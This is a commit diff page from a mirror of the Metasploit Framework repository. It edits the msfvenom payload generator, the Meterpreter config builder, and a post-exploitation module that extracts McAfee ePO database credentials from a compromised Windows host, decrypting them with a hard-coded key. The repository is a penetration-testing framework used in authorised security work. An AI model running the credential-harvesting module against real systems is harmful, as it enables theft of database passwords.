infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of git://github.com/rapid7/metasploit-framework

bug/bundler_fix
Samuel Huckins 2015-05-19 08:39:10 -05:00
parent e2c6742c1b 84060bbaeb
commit c0b0a95d95
4 changed files with 86 additions and 77 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
lib/msf/core/payload_generator.rb
View File

@ -64,6 +64,9 @@ module Msf
# @!attribute space # @!attribute space
# @return [Fixnum] The maximum size in bytes of the payload # @return [Fixnum] The maximum size in bytes of the payload
attr_accessor :space attr_accessor :space
# @!attribute encoder_space
# @return [Fixnum] The maximum size in bytes of the encoded payload
attr_accessor :encoder_space
# @!attribute stdin # @!attribute stdin
# @return [String] The raw bytes of a payload taken from STDIN # @return [String] The raw bytes of a payload taken from STDIN
attr_accessor :stdin attr_accessor :stdin
@ -85,6 +88,7 @@ module Msf
# @option opts [String] :badchars (see #badchars) # @option opts [String] :badchars (see #badchars)
# @option opts [String] :template (see #template) # @option opts [String] :template (see #template)
# @option opts [Fixnum] :space (see #space) # @option opts [Fixnum] :space (see #space)
# @option opts [Fixnum] :encoder_space (see #encoder_space)
# @option opts [Fixnum] :nops (see #nops) # @option opts [Fixnum] :nops (see #nops)
# @option opts [String] :add_code (see #add_code) # @option opts [String] :add_code (see #add_code)
# @option opts [Boolean] :keep (see #keep) # @option opts [Boolean] :keep (see #keep)
@ -109,6 +113,7 @@ module Msf
@stdin = opts.fetch(:stdin, nil) @stdin = opts.fetch(:stdin, nil)
@template = opts.fetch(:template, '') @template = opts.fetch(:template, '')
@var_name = opts.fetch(:var_name, 'buf') @var_name = opts.fetch(:var_name, 'buf')
@encoder_space = opts.fetch(:encoder_space, @space)
@framework = opts.fetch(:framework) @framework = opts.fetch(:framework)
@ -200,7 +205,7 @@ module Msf
encoder_list.each do |encoder_mod| encoder_list.each do |encoder_mod|
cli_print "Attempting to encode payload with #{iterations} iterations of #{encoder_mod.refname}" cli_print "Attempting to encode payload with #{iterations} iterations of #{encoder_mod.refname}"
begin begin
encoder_mod.available_space = @space encoder_mod.available_space = @encoder_space
return run_encoder(encoder_mod, shellcode.dup) return run_encoder(encoder_mod, shellcode.dup)
rescue ::Msf::EncoderSpaceViolation => e rescue ::Msf::EncoderSpaceViolation => e
cli_print "#{encoder_mod.refname} failed with #{e.message}" cli_print "#{encoder_mod.refname} failed with #{e.message}"
@ -395,7 +400,7 @@ module Msf
iterations.times do |x| iterations.times do |x|
shellcode = encoder_module.encode(shellcode.dup, badchars, nil, platform_list) shellcode = encoder_module.encode(shellcode.dup, badchars, nil, platform_list)
cli_print "#{encoder_module.refname} succeeded with size #{shellcode.length} (iteration=#{x})" cli_print "#{encoder_module.refname} succeeded with size #{shellcode.length} (iteration=#{x})"
if shellcode.length > space if shellcode.length > encoder_space
raise EncoderSpaceViolation, "encoder has made a buffer that is too big" raise EncoderSpaceViolation, "encoder has made a buffer that is too big"
end end
end end

10
lib/rex/payloads/meterpreter/config.rb
View File

@ -39,7 +39,7 @@ private
end end
def to_wchar_t(item, size) def to_wchar_t(item, size)
to_ascii(item, size).unpack("C*").pack("v*") to_ascii(item, size).unpack('C*').pack('v*')
end end
def to_ascii(item, size) def to_ascii(item, size)
@ -57,7 +57,7 @@ private
uuid # the UUID uuid # the UUID
] ]
session_data.pack("VVVA*") session_data.pack('VVVA*')
end end
def transport_block(opts) def transport_block(opts)
@ -117,7 +117,7 @@ private
ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}", ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}",
file_extension)) file_extension))
extension_data = [ ext.length, ext ].pack("VA*") extension_data = [ ext.length, ext ].pack('VA*')
end end
def config_block def config_block
@ -143,9 +143,9 @@ private
# terminate the extensions with a 0 size # terminate the extensions with a 0 size
if is_x86? if is_x86?
config << [0].pack("V") config << [0].pack('V')
else else
config << [0].pack("Q") config << [0].pack('Q<')
end end
# and we're done # and we're done

85
modules/post/windows/gather/credentials/epo_sql.rb
View File

@ -5,7 +5,7 @@
require 'msf/core' require 'msf/core'
require 'rex' require 'rex'
require "net/dns/resolver" require 'net/dns/resolver'
require 'msf/core/auxiliary/report' require 'msf/core/auxiliary/report'
class Metasploit3 < Msf::Post class Metasploit3 < Msf::Post
@ -30,20 +30,20 @@ class Metasploit3 < Msf::Post
def run def run
# Find out where things are installed # Find out where things are installed
print_status("Finding Tomcat install path...") print_status('Finding Tomcat install path...')
subkeys = registry_enumkeys("HKLM\\Software\\Network Associates\\ePolicy Orchestrator") subkeys = registry_enumkeys('HKLM\Software\Network Associates\ePolicy Orchestrator',REGISTRY_VIEW_32_BIT)
if subkeys.nil? or subkeys.empty? if subkeys.nil? or subkeys.empty?
print_error ("ePO 4.6 Not Installed or No Permissions to RegKey") print_error ('ePO 4.6 Not Installed or No Permissions to RegKey')
return return
end end
# Get the db.properties file location # Get the db.properties file location
epol_reg_key = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator" epol_reg_key = 'HKLM\Software\Network Associates\ePolicy Orchestrator'
dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder") dbprops_file = registry_getvaldata(epol_reg_key, 'TomcatFolder',REGISTRY_VIEW_32_BIT)
if dbprops_file == nil or dbprops_file == "" if dbprops_file == nil or dbprops_file == ''
print_error("Could not find db.properties file location") print_error('Could not find db.properties file location')
else else
dbprops_file << "/conf/orion/db.properties"; dbprops_file << '/conf/orion/db.properties';
print_good("Found db.properties location"); print_good('Found db.properties location');
process_config(dbprops_file); process_config(dbprops_file);
end end
end end
@ -57,39 +57,39 @@ class Metasploit3 < Msf::Post
line.chomp line.chomp
line_array = line.split('=') line_array = line.split('=')
case line_array[0] case line_array[0]
when "db.database.name" when 'db.database.name'
database_name = "" database_name = ''
line_array[1].each_byte { |x| database_name << x unless x > 126 || x < 32 } line_array[1].each_byte { |x| database_name << x unless x > 126 || x < 32 }
when "db.instance.name" when 'db.instance.name'
database_instance = "" database_instance = ''
line_array[1].each_byte { |x| database_instance << x unless x > 126 || x < 32 } line_array[1].each_byte { |x| database_instance << x unless x > 126 || x < 32 }
when "db.user.domain" when 'db.user.domain'
user_domain = "" user_domain = ''
line_array[1].each_byte { |x| user_domain << x unless x > 126 || x < 32 } line_array[1].each_byte { |x| user_domain << x unless x > 126 || x < 32 }
when "db.user.name" when 'db.user.name'
user_name = "" user_name = ''
line_array[1].each_byte { |x| user_name << x unless x > 126 || x < 32 } line_array[1].each_byte { |x| user_name << x unless x > 126 || x < 32 }
when "db.port" when 'db.port'
port = "" port = ''
line_array[1].each_byte { |x| port << x unless x > 126 || x < 32 } line_array[1].each_byte { |x| port << x unless x > 126 || x < 32 }
when "db.user.passwd.encrypted.ex" when 'db.user.passwd.encrypted.ex'
# ePO 4.6 encrypted password # ePO 4.6 encrypted password
passwd = "" passwd = ''
line_array[1].each_byte { |x| passwd << x unless x > 126 || x < 32 } line_array[1].each_byte { |x| passwd << x unless x > 126 || x < 32 }
passwd.gsub("\\","") passwd.gsub('\\','')
# Add any Base64 padding that may have been stripped out # Add any Base64 padding that may have been stripped out
passwd << "=" until ( passwd.length % 4 == 0 ) passwd << '=' until ( passwd.length % 4 == 0 )
plaintext_passwd = decrypt46(passwd) plaintext_passwd = decrypt46(passwd)
when "db.user.passwd.encrypted" when 'db.user.passwd.encrypted'
# ePO 4.5 encrypted password - not currently supported, see notes below # ePO 4.5 encrypted password - not currently supported, see notes below
passwd = "" passwd = ''
line_array[1].each_byte { |x| passwd << x unless x > 126 || x < 32 } line_array[1].each_byte { |x| passwd << x unless x > 126 || x < 32 }
passwd.gsub("\\","") passwd.gsub('\\','')
# Add any Base64 padding that may have been stripped out # Add any Base64 padding that may have been stripped out
passwd << "=" until ( passwd.length % 4 == 0 ) passwd << '=' until ( passwd.length % 4 == 0 )
plaintext_passwd = "PASSWORD NOT RECOVERED - ePO 4.5 DECRYPT SUPPORT IS WIP" plaintext_passwd = 'PASSWORD NOT RECOVERED - ePO 4.5 DECRYPT SUPPORT IS WIP'
when "db.server.name" when 'db.server.name'
database_server_name = "" database_server_name = ''
line_array[1].each_byte { |x| database_server_name << x unless x > 126 || x < 32 } line_array[1].each_byte { |x| database_server_name << x unless x > 126 || x < 32 }
end end
end end
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Post
result = client.net.resolve.resolve_host(database_server_name) result = client.net.resolve.resolve_host(database_server_name)
if result[:ip].nil? or result[:ip].empty? if result[:ip].nil? or result[:ip].empty?
print_error("Could not determine IP of DB - credentials not added to report database") print_error('Could not determine IP of DB - credentials not added to report database')
return return
end end
@ -111,11 +111,11 @@ class Metasploit3 < Msf::Post
print_good("Database IP: #{db_ip}") print_good("Database IP: #{db_ip}")
end end
print_good("Port: #{port}") print_good("Port: #{port}")
if user_domain == nil or user_domain == "" if user_domain == nil or user_domain == ''
print_good("Authentication Type: SQL"); print_good('Authentication Type: SQL');
full_user = user_name full_user = user_name
else else
print_good("Authentication Type: Domain"); print_good('Authentication Type: Domain');
print_good("Domain: #{user_domain}"); print_good("Domain: #{user_domain}");
full_user = "#{user_domain}\\#{user_name}" full_user = "#{user_domain}\\#{user_name}"
end end
@ -127,8 +127,8 @@ class Metasploit3 < Msf::Post
service_data = { service_data = {
address: Rex::Socket.getaddress(db_ip), address: Rex::Socket.getaddress(db_ip),
port: port, port: port,
protocol: "tcp", protocol: 'tcp',
service_name: "mssql", service_name: 'mssql',
workspace_id: myworkspace_id workspace_id: myworkspace_id
} }
@ -145,21 +145,21 @@ class Metasploit3 < Msf::Post
login_data = { login_data = {
core: credential_core, core: credential_core,
access_level: "User", access_level: 'User',
status: Metasploit::Model::Login::Status::UNTRIED status: Metasploit::Model::Login::Status::UNTRIED
} }
create_credential_login(login_data.merge(service_data)) create_credential_login(login_data.merge(service_data))
print_good("Added credentials to report database") print_good('Added credentials to report database')
else else
print_error("Could not determine IP of DB - credentials not added to report database") print_error('Could not determine IP of DB - credentials not added to report database')
end end
end end
def decrypt46(encoded) def decrypt46(encoded)
encrypted_data = Rex::Text.decode_base64(encoded) encrypted_data = Rex::Text.decode_base64(encoded)
aes = OpenSSL::Cipher::Cipher.new("AES-128-ECB") aes = OpenSSL::Cipher::Cipher.new('AES-128-ECB')
aes.padding = 0 aes.padding = 0
aes.decrypt aes.decrypt
# Private key extracted from ePO 4.6.0 Build 1029 # Private key extracted from ePO 4.6.0 Build 1029
@ -172,6 +172,5 @@ class Metasploit3 < Msf::Post
password.gsub!(/[^[:print:]]/,'') password.gsub!(/[^[:print:]]/,'')
return password return password
end end
end end

59
msfvenom
View File

@ -58,7 +58,8 @@ require 'msf/core/payload_generator'
opt.separator('') opt.separator('')
opt.separator('Options:') opt.separator('Options:')
opt.on('-p', '--payload <payload>', String, 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p| opt.on('-p', '--payload <payload>', String,
'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p|
if p == '-' if p == '-'
opts[:payload] = 'stdin' opts[:payload] = 'stdin'
else else
@ -66,50 +67,67 @@ require 'msf/core/payload_generator'
end end
end end
opt.on('-l', '--list [module_type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| opt.on('--payload-options', "List the payload's standard options") do
opts[:list_options] = true
end
opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l|
if l.nil? or l.empty? if l.nil? or l.empty?
l = ["all"] l = ["all"]
end end
opts[:list] = l opts[:list] = l
end end
opt.on('-n', '--nopsled <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| opt.on('-n', '--nopsled <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n|
opts[:nops] = n.to_i opts[:nops] = n.to_i
end end
opt.on('-f', '--format <format>', String, "Output format (use --help-formats for a list)") do |f| opt.on('-f', '--format <format>', String, "Output format (use --help-formats for a list)") do |f|
opts[:format] = f opts[:format] = f
end end
opt.on('-e', '--encoder [encoder]', String, 'The encoder to use') do |e| opt.on('--help-formats', String, "List available formats") do
init_framework(:module_types => [])
msg = "Executable formats\n" +
"\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" +
"Transform formats\n" +
"\t" + ::Msf::Simple::Buffer.transform_formats.join(", ")
raise UsageError, msg
end
opt.on('-e', '--encoder <encoder>', String, 'The encoder to use') do |e|
opts[:encoder] = e opts[:encoder] = e
end end
opt.on('-a', '--arch <architecture>', String, 'The architecture to use') do |a| opt.on('-a', '--arch <arch>', String, 'The architecture to use') do |a|
opts[:arch] = a opts[:arch] = a
end end
opt.on('--platform <platform>', String, 'The platform of the payload') do |l| opt.on('--platform <platform>', String, 'The platform of the payload') do |l|
opts[:platform] = l opts[:platform] = l
end end
opt.on('-s', '--space <length>', Integer, 'The maximum size of the resulting payload') do |s| opt.on('-s', '--space <length>', Integer, 'The maximum size of the resulting payload') do |s|
opts[:space] = s opts[:space] = s
end end
opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s|
opts[:encoder_space] = s
end
opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
opts[:badchars] = Rex::Text.hex_to_raw(b) opts[:badchars] = Rex::Text.hex_to_raw(b)
end end
opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i| opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i|
opts[:iterations] = i opts[:iterations] = i
end end
opt.on('-c', '--add-code <path>', String, 'Specify an additional win32 shellcode file to include') do |x| opt.on('-c', '--add-code <path>', String, 'Specify an additional win32 shellcode file to include') do |x|
opts[:add_code] = x opts[:add_code] = x
end end
opt.on('-x', '--template <path>', String, 'Specify a custom executable file to use as a template') do |x| opt.on('-x', '--template <path>', String, 'Specify a custom executable file to use as a template') do |x|
opts[:template] = x opts[:template] = x
end end
@ -117,15 +135,11 @@ require 'msf/core/payload_generator'
opts[:keep] = true opts[:keep] = true
end end
opt.on('--payload-options', "List the payload's standard options") do opt.on('-o', '--out <path>', 'Save the payload') do |x|
opts[:list_options] = true
end
opt.on('-o', '--out <path>', 'Save the payload') do |x|
opts[:out] = x opts[:out] = x
end end
opt.on('-v', '--var-name <name>', String, 'Specify a custom variable name to use for certain output formats') do |x| opt.on('-v', '--var-name <name>', String, 'Specify a custom variable name to use for certain output formats') do |x|
opts[:var_name] = x opts[:var_name] = x
end end
@ -133,15 +147,6 @@ require 'msf/core/payload_generator'
raise UsageError, "#{opt}" raise UsageError, "#{opt}"
end end
opt.on_tail('--help-formats', String, "List available formats") do
init_framework(:module_types => [])
msg = "Executable formats\n" +
"\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" +
"Transform formats\n" +
"\t" + ::Msf::Simple::Buffer.transform_formats.join(", ")
raise UsageError, msg
end
begin begin
opt.parse!(args) opt.parse!(args)
rescue OptionParser::InvalidOption => e rescue OptionParser::InvalidOption => e